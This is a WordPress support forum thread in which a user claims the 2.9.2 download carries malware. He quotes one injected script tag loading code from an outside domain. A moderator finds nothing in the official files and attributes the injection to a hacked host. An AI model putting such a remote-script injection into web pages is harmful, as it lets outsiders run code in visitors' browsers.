Attn WP staff: your 2.9.2 files are infected!

  • Mike

    (@creditcardforum)


    14 years, 10 months ago

    I have WP on dozens of blogs and am very experienced with it… I am shocked this has happened:

    I downloaded 2.9.2 for upgrade and embedded in the files is malicious code:

    i.e. 

    </div> <!-- Footer div -->
</div> <!-- Wrapper div -->

<script src="https://kdjkfjskdfjlskdjf.com/kp.php"></script>
</body>
</html>

    On the top of page.php, index.php, etc there is also malicious (and long) PHP execution script. Please, someone needs to address this ASAP- my blog has been ruined and I’m trying to restore backup files. Someone needs to find and stop this corrupt download. I downloaded directly from www.ads-software.com

Viewing 4 replies - 1 through 4 (of 4 total)

  • Are you sure it’s not on the side of your host? I have wordpress 2.9.2 and I don’t have anything embedded in it.

    My site got hacked a few months ago and they embedded junk code like that as well. My host said that somehow they got my ftp password and edited just about every file and embedded links, scripts etc.

    Moderator James Huff

    (@macmanx)

    I just looked through the source of the index.php and page.php files from the Default and Classic themes and the main index.php file from WordPress 2.9.2. I see absolutely no reference to any sort or malware or the script tag that you posted. Are your sure the malware is not in your own theme, added by a plugin, or perhaps added by a hacker as mentioned above?

    Moderator James Huff

    (@macmanx)

    Looking a some earlier threads, I bet your blog is either hosted with GoDaddy or subject to the same vulnerability. See these for more info:

    https://www.ads-software.com/support/topic/391658

    https://codex.www.ads-software.com/FAQ_My_site_was_hacked

    closing this hysterical thread as bunk – posted twice, anyway

Viewing 4 replies - 1 through 4 (of 4 total)
  • The topic ‘Attn WP staff: your 2.9.2 files are infected!’ is closed to new replies.